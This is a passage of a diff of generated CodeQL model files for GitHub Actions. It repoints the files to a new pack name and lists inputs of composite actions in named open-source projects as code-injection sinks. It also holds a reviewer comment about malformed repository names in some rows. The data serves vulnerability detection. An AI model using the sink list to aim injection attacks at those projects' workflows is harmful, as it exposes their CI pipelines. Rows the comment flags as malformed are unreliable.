@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index c6839a7b004..8b438734d5d 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index 9e708bbcc89..a6222605575 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index cfb67540b17..07c4cc427c1 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 7186433e6d2..77adcd6151d 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index d39aafe162f..fe453b3086d 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index a3b53b3ec96..6d5296ba6d1 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index 2a35d22a10e..14600fdc23e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index 156d244ece2..a67988b08aa 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index fcda4b3dfec..663702e6418 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index 84877f57d8c..de7a728d096 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index dcb93d013a0..360eb948595 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index 4776bb79067..290712830e2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index 2540e6a76ca..d58063c2452 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index 525064de6a9..784627c32ab 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index b46d5a3ee6a..b4f5866b86d 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 631457c813e..77a7407adfb 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index 44d9eb10a0d..a97bce1de7a 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index 0d7f80698f5..5bf814bcc69 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 84caa043484..6a141053bbe 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index f6aed253a21..4fec81ed178 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 1eac49617f2..1290646ef6d 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index 1efa6815c28..60a023c9730 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 91463a305dd..1a99c3773de 100644 --- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index 7ef240ad999..e3cf5db0f15 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml index db953acf5bc..67866c4f904 100644 --- a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index 7c1b01e14b5..2317aa06ae2 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index 37b67a933a3..baf9c55ff18 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 570a9bdd142..583be58ecd2 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index 8c1993c47ca..e8250232853 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index ee0adaadb3e..d3172c56667 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index c127f03bb66..7c1f9dac6bb 100644 --- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index 3b3d60fadd0..c77798c1022 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 4dd43acd2c5..3035324bee0 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index cb4bff25f9a..dd208976fc5 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index 39a204389b9..63f111f3e83 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index 6b4192c0c61..c330ca64c08 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index 63c3fc89058..6b67c69e6e3 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index 72772ae47cf..135bb4baa8b 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index 43cc1e0187e..c201386cf93 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index 7c80b7e6eda..5e39d3f6c5f 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml 
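Review bot: The data row in `braintree_braintree_android.model.yml` names the action `braintree/braintree/android`, which does not line up with the file name; presumably the repository is `braintree/braintree_android` and the generator turned every underscore into a slash when rebuilding the name. If that is so, the row never matches a workflow that references the real action, and the `input.version` code-injection sink goes unreported whichever pack `addsTo` points at. The same pattern appears in `cloudfoundry_cloud_controller_ng.model.yml`, whose row reads `cloudfoundry/cloud_controller/ng`. These files are generated, so the fix belongs in the generator rather than here; the corrected row would read `- ["braintree/braintree_android", "*", "input.version", "code-injection", "generated"]`.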
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 1f7b69e6254..9a9f865b0db 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index 7879a7903b4..5c877a87d68 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index dbbd4c720ca..6e9e8363290 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index f99698b1992..f0e62cdaec1 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index a98a135d6b4..b1158922636 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index 3ebb5e7acb3..78c1a396056 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index b26aa6ea48b..75c257f39ae 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 683965e13d2..4d19b3ec0af 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index 9358c895f3c..b8bdc7276fb 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index 8233e506603..220dbb58e02 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index 2aea730db7e..1992cbf4696 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index b03d2391882..02c01196842 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 9db70f02db4..50af2e33e16 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["coder/coder", "*", 